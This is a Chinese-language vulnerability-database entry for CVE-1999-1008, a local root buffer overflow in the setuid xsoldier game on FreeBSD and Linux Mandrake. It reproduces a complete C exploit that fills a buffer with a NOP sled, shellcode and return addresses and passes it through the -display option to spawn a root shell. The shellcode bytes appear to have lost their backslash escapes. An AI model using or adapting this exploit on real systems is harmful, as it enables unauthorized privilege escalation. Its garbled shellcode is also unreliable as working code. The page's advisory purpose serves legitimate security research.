FreeBSD 和Linux Mandrake ‘xsoldier’缓冲区溢出漏洞
漏洞ID | 1105839 | 漏洞类型 | 边界条件错误 |
发布时间 | 2000-05-17 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-1999-1008 |
CNNVD-ID | CNNVD-200005-069 |
漏洞平台 | Linux | CVSS评分 | 7.2 |
|漏洞来源
|漏洞详情
xsoldier程序存在漏洞。本地用户借助超长参数可以提升根访问权。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/871/info
Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console.
The binary itself is subject to a buffer overflow attack (which may be launched from the command line) which can be launched to gain root privileges. The overflow itself is in the code written to handle the -display option and is possible to overflow by a user-supplied long string.
The user does not have to have a valid $DISPLAY to exploit this.
*/
/*Larry W. Cashdollar linux xsolider exploit.
*[email protected] http://vapid.dhs.org
*if xsolider is built and installed from its source it will be installed
*setuid root in /usr/local/games
*original exploit found by brock tellier for freebsd 3.3 ports packages.
*If a setregid() call is placed in the shellcode, you can get egid=12
*with the default mandrake installation.*/
#include <stdio.h>
#include <stdlib.h>
#define NOP 0x90 /*no operation skip to next instruction. */
#define LEN 4480 /*our buffersize. */
char shellcode[] = /*execve with setreuid(0,0) and no '/' hellkit v1.1 */
"xebx03x5exebx05xe8xf8xffxffxffx83xc6x0dx31xc9xb1x6cx80x36x01x46xe2xfa"
"xeax09x2ex63x68x6fx2ex72x69x01x80xedx66x2ax01x01"
"x54x88xe4x82xedx1dx56x57x52xe9x01x01x01x01x5ax80xc2xc7x11"
"x01x01x8cxbax1fxeexfexfexc6x44xfdx01x01x01x01x88x7cxf9xb9"
"x47x01x01x01x30xf7x30xc8x52x88xf2xccx81x8cx4cxf9xb9x0ax01"
"x01x01x88xffx30xd3x52x88xf2xccx81x30xc1x5ax5fx5ex88xedx5c"
"xc2x91";
/*Nab the stack pointer to use as an index into our nop's*/
long
get_sp ()
{
__asm__ ("mov %esp, %eax");
}
int
main (int argc, char *argv[])
{
char buffer[LEN];
int i, offset;
long retaddr = get_sp ();
if (argc <= 1)
offset = 0;
else
offset = atoi (argv[1]);
/*#Copy the NOPs in to the buffer leaving space for shellcode and
#pointers*/
for (i = 0; i < (LEN - strlen (shellcode) - 100); i++)
*(buffer + i) = NOP;
/*[NNNNNNNNNNNNNNNNNNNNN ]*/
/* ^-- LEN -(strlen(shellcode)) - 35*/
/*#Copy the shell code into the buffer*/
memcpy (buffer + i, shellcode, strlen (shellcode));
/*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSS ]*/
/* ^-(buffer+i) */
/*#Fill the buffer with our new address to jump to esp + offset */
for (i = i + strlen (shellcode); i < LEN; i += 4)
*(long *) &buffer[i] = retaddr+offset;
/*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSRRRRRRRRRRRRR]*/
/* ^-(i+strlen(shellcode))*/
printf ("Jumping to address %x BufSize %dn", retaddr + offset, LEN);
execl ("/usr/local/games/xsoldier", "xsoldier", "-display", buffer, 0);
}
|参考资料
来源:BID
名称:871
链接:http://www.securityfocus.com/bid/871
来源:marc.theaimsgroup.com
链接:http://marc.theaimsgroup.com/?l=freebsd-security&m;=94531826621620&w;=2
相关推荐: PHP-Board User Password Disclosure Vulnerability
PHP-Board User Password Disclosure Vulnerability 漏洞ID 1100865 漏洞类型 Access Validation Error 发布时间 2003-02-15 更新时间 2003-02-15 CVE编号 N…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666